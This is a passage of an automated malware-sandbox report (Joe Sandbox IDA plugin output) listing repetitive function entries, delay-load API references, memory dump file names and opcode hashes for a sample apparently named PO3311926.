Opcode Fuzzy Hash: e84aa5dafaa8f7dc0a10fcc62056a2a88d51740498120c120bf4b2feecc4e63a
Instruction Fuzzy Hash: E1B012F1258041AE3604510A6C03CFB41CDD0C8F10330C0BFF826C01E0F8C0ED004431

Uniqueness

Uniqueness Score: -1.00%

Function 00BBE232 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BBE1E3

Part of subcall function 00BBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BBE8D0
Part of subcall function 00BBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BBE8E1

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 155053dd01a6ad98ac383aeb36311e4c29ee6f1edc7be2d2fe8f238aa1e5afe3
Instruction ID: 3938156ff77f425370d9cb93d692401774b70fe0a28ad445f63939969f796b91
Opcode Fuzzy Hash: 155053dd01a6ad98ac383aeb36311e4c29ee6f1edc7be2d2fe8f238aa1e5afe3
Instruction Fuzzy Hash: 9EB092E1258041AE2604510A6D02DBA41CDC084B1033080AAB826C01A0E880AA014431

Uniqueness

Uniqueness Score: -1.00%

Function 00BBE228 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BBE1E3

Part of subcall function 00BBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BBE8D0
Part of subcall function 00BBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BBE8E1

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 4d9f9682c8edd506657151fa2b4a9b006c8e206a209ebc5bcb14bc4b3ddf1b8f
Instruction ID: 4acb615562c812ba471d84d5567be503e9e5fb0733e8e6cd749909c07b031d41
Opcode Fuzzy Hash: 4d9f9682c8edd506657151fa2b4a9b006c8e206a209ebc5bcb14bc4b3ddf1b8f
Instruction Fuzzy Hash: B0B092E1258141AE264451096C02CBA01CDC084B1033081AAB826C01A0E880A9404431

Uniqueness

Uniqueness Score: -1.00%

Function 00BBE21E Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BBE1E3

Part of subcall function 00BBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BBE8D0
Part of subcall function 00BBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BBE8E1

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: bb7e3130acf90742ec06394593522c979674884e9b1ed99b6b2d8a9bbbe95b13
Instruction ID: 99eabbdcf34f91c845a1a19a0f8be7cd1ae7e8381bdfd34e0a7f66d57a8a2de7
Opcode Fuzzy Hash: bb7e3130acf90742ec06394593522c979674884e9b1ed99b6b2d8a9bbbe95b13
Instruction Fuzzy Hash: C7B092E1259041AE260451096C02CBA01CDC085B10330C0AAB826C01A0E880E9004471

Uniqueness

Uniqueness Score: -1.00%

Function 00BBE20A Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BBE1E3

Part of subcall function 00BBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BBE8D0
Part of subcall function 00BBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BBE8E1

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 1c98f37f4dfa42781c5ae948ecf00ff1cc614df9ef4f352199b10c22877cd38b
Instruction ID: f6f4a87f9ccaaaf3fcd26236b4bd16d6b9bad3c4f62b89f54f2c7b2cb0f67f31
Opcode Fuzzy Hash: 1c98f37f4dfa42781c5ae948ecf00ff1cc614df9ef4f352199b10c22877cd38b
Instruction Fuzzy Hash: D3B012E1258041EE3504520A6D03CFB41CDC0C4B10330C0BFF825C02E0FCD0ED494431

Uniqueness

Uniqueness Score: -1.00%

Function 00BBE200 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BBE1E3

Part of subcall function 00BBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BBE8D0
Part of subcall function 00BBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BBE8E1

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 32c63ab802375f0e0fcb3203d07fe85537e607cc4c88da8f93185214f63be6a0
Instruction ID: cf1a8e9b5be076a582764ca3b729303349fb38f377135e46aa9d96daaefa0fe8
Opcode Fuzzy Hash: 32c63ab802375f0e0fcb3203d07fe85537e607cc4c88da8f93185214f63be6a0
Instruction Fuzzy Hash: F5B092E1258181AE254452096C02CBA01CDC084B10330C1AAB825C02A0E880A8444431

Uniqueness

Uniqueness Score: -1.00%

Function 00BBE26E Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BBE1E3

Part of subcall function 00BBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BBE8D0
Part of subcall function 00BBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BBE8E1

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: e9a029d8353b7e672aa6443f3e6d44eb2cae12331411391d5852677c410cdca9
Instruction ID: 281a23b6fea45782e252292f3bba7ae8b4c019f97fd7135a0513ad79e5f467c0
Opcode Fuzzy Hash: e9a029d8353b7e672aa6443f3e6d44eb2cae12331411391d5852677c410cdca9
Instruction Fuzzy Hash: C3B012E1258041AE350451196C03CFF01DDC0C5B10330C0BFFD25C01E0F9C0EC004471

Uniqueness

Uniqueness Score: -1.00%

Function 00BBE264 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BBE1E3

Part of subcall function 00BBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BBE8D0
Part of subcall function 00BBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BBE8E1

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: a60d37fca1b571d82daf56845ff221e0cf47cfe4276818af3100c948a94b9e02
Instruction ID: f9ddc8c9413f300892acb9bd3ac52ffcaa4c25878353ebaeb2c8742f909289a9
Opcode Fuzzy Hash: a60d37fca1b571d82daf56845ff221e0cf47cfe4276818af3100c948a94b9e02
Instruction Fuzzy Hash: 7EB012E126D081AE350451096C03CFB01CED4C8B10330C0BFF826C41E0F8C0EC004431

Uniqueness

Uniqueness Score: -1.00%

Function 00BBE250 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BBE1E3

Part of subcall function 00BBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BBE8D0
Part of subcall function 00BBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BBE8E1

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 9184ab7c86227272f5cb286abe16325c8d16286ec8570b36a16a9de9c79b47af
Instruction ID: f0504a4b18d24b88d541c84a549a8c647894f9f7626aa0d428161b5c1443c786
Opcode Fuzzy Hash: 9184ab7c86227272f5cb286abe16325c8d16286ec8570b36a16a9de9c79b47af
Instruction Fuzzy Hash: 1AB092E1259181AE254452096C02CBA01CEC084B1033081AAB825C41A0E880A8444431

Uniqueness

Uniqueness Score: -1.00%

Function 00BBE246 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BBE1E3

Part of subcall function 00BBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BBE8D0
Part of subcall function 00BBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BBE8E1

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 59840227cd83fe48ba1aa5430dd52f8e69c48a532431a882459064bbb8577af2
Instruction ID: de30e16d008cec934061bbd377161b56246d007891d2fe880420a42708c6ac24
Opcode Fuzzy Hash: 59840227cd83fe48ba1aa5430dd52f8e69c48a532431a882459064bbb8577af2
Instruction Fuzzy Hash: D5B012E125D081AE350451096C03CFB01CEC0C5B10330C0BFFC25D41E0F8C0EC004471

Uniqueness

Uniqueness Score: -1.00%

Function 00BBE423 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BBE3FC

Part of subcall function 00BBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BBE8D0
Part of subcall function 00BBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BBE8E1

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: fd8c88069e01b8949bbc7352fecc8206260b57322a6d770bbcbe684b051a93d7
Instruction ID: b7c33bec8274a5b16900be60020d66cd15fe9d08b7992b01f1e29e35aebf4909
Opcode Fuzzy Hash: fd8c88069e01b8949bbc7352fecc8206260b57322a6d770bbcbe684b051a93d7
Instruction Fuzzy Hash: 77B012F125A041BE368492045C42CF702CDC0C0F1033080BFF824C61E0F8C0CE005473

Uniqueness

Uniqueness Score: -1.00%

Function 00BBE419 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BBE3FC

Part of subcall function 00BBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BBE8D0
Part of subcall function 00BBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BBE8E1

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 6f1755390c58a20950644e514df670703f2f3709e2cc35a68a60bc93c075b8b7
Instruction ID: d7a5fb9a4184804d4b5d4f7bd94ec45fa4e89af2455cd7da4b926dd1b2d16468
Opcode Fuzzy Hash: 6f1755390c58a20950644e514df670703f2f3709e2cc35a68a60bc93c075b8b7
Instruction Fuzzy Hash: 48B012E12590417E358452055D42CF742CDC0C0B10330C0BFF524C61E0F8C0CC495473

Uniqueness

Uniqueness Score: -1.00%

Function 00BBE44B Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BBE3FC

Part of subcall function 00BBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BBE8D0
Part of subcall function 00BBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BBE8E1

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 11e5c18d156ae203ae8cfb27e83824090620bd94e82a172bd0c6c737dcc54d4c
Instruction ID: 040f42991ed25d7dc902671a1a30d87d27e3585b9a9dd8236a7042f500560b5c
Opcode Fuzzy Hash: 11e5c18d156ae203ae8cfb27e83824090620bd94e82a172bd0c6c737dcc54d4c
Instruction Fuzzy Hash: 84B012E1259141BE358492045C42CF702CDC0C0B10330C0BFF824C61E0F8C0CC045473

Uniqueness

Uniqueness Score: -1.00%

Function 00BBE5B1 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BBE580

Part of subcall function 00BBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BBE8D0
Part of subcall function 00BBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BBE8E1

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 681a7950bad51bb239d2c712df164a8028bd0f973efd3477362e8fdb67153bb3
Instruction ID: a6e6b5702cc13f84b00c47e16eaa4a4d74263060fcab91eedf6d0d491c632887
Opcode Fuzzy Hash: 681a7950bad51bb239d2c712df164a8028bd0f973efd3477362e8fdb67153bb3
Instruction Fuzzy Hash: 22B012D12581417E354851549C0BCFB01EDC4C4B1033042AFF424C21E0F8C0CD404435

Uniqueness

Uniqueness Score: -1.00%

Function 00BBE5A7 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BBE580

Part of subcall function 00BBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BBE8D0
Part of subcall function 00BBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BBE8E1

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: e5d944eb6f81f41038e27b94c9dd94e0e3364993028860750d27268a5c49d878
Instruction ID: 339dc7d5fb6b2867aa59ffeae70e8894da552d1f0295f0134f97f8624d651135
Opcode Fuzzy Hash: e5d944eb6f81f41038e27b94c9dd94e0e3364993028860750d27268a5c49d878
Instruction Fuzzy Hash: 03B012D12580417E350851559D06CFB41EDC4C4B1033042AFF424C21E0FCC0CE014435

Uniqueness

Uniqueness Score: -1.00%

Function 00BBE593 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BBE580

Part of subcall function 00BBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BBE8D0
Part of subcall function 00BBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BBE8E1

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 5081b08870b27903bace6d13f3ccf6028b360500f5ebe1d48461da2425d6fcb5
Instruction ID: bcb0dadce7fbbd4595cc392a331e96148f4f0af57ba22b9c8d8d809d98d3a842
Opcode Fuzzy Hash: 5081b08870b27903bace6d13f3ccf6028b360500f5ebe1d48461da2425d6fcb5
Instruction Fuzzy Hash: 0DB012D12580417F350852545C02CFB01CDC5C8B1033040AFF824C21E0F8C0CC044435

Uniqueness

Uniqueness Score: -1.00%

Function 00BBE53C Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BBE51F

Part of subcall function 00BBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BBE8D0
Part of subcall function 00BBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BBE8E1

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: aa21ee15d5ba0d4025d7f01a41710e0a705e7f265c4f6c5abb51a35f6d1b8053
Instruction ID: d14193a6740eb25cb5c682e66251c827a9903703241ed42200a61b0b0781d20b
Opcode Fuzzy Hash: aa21ee15d5ba0d4025d7f01a41710e0a705e7f265c4f6c5abb51a35f6d1b8053
Instruction Fuzzy Hash: 6FB012C1699441BE3504A1089C06CFB0ACDC1C6F1433082EFF824C11E0F8C0CD004432

Uniqueness

Uniqueness Score: -1.00%

